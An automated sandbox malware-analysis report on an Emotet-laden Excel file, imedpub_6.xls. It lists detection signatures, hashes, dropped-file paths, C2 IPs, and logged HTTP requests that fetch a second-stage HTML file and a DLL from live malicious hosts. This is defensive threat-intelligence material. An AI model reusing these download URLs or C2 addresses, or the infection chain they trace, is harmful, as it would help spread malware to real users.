Windows Analysis Report
imedpub_6.xls

Overview

General Information

Sample Name: imedpub_6.xls
Analysis ID: 562403
MD5: eee4085b8c00a4dbae2459b0f97ebeb7
SHA1: c449b3584ff6db4b37c402aa27ed8b6793b5bd74
SHA256: b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: 13.2.rundll32.exe.2430000.5.unpack Malware Configuration Extractor: Emotet
Source: imedpub_6.xls ReversingLabs: Detection: 18%
Source: hostfeeling.com Virustotal: Detection: 10% Perma Link
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Source: global traffic DNS query: name: hostfeeling.com

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1
    Host: jurnalpjf.lan.go.id
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
    Date: Fri, 28 Jan 2022 20:02:00 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.4.27
    X-Powered-By: PHP/7.4.27
    Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Fri, 28 Jan 2022 20:02:00 GMT
    Expires: Fri, 28 Jan 2022 20:02:00 GMT
    Content-Disposition: attachment; filename="uHkwl.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 548864
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Source: unknown Network traffic detected: IP country count 21
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com\<4& equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud

Source: Yara match File source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Source: imedpub_6.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: imedpub_6.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
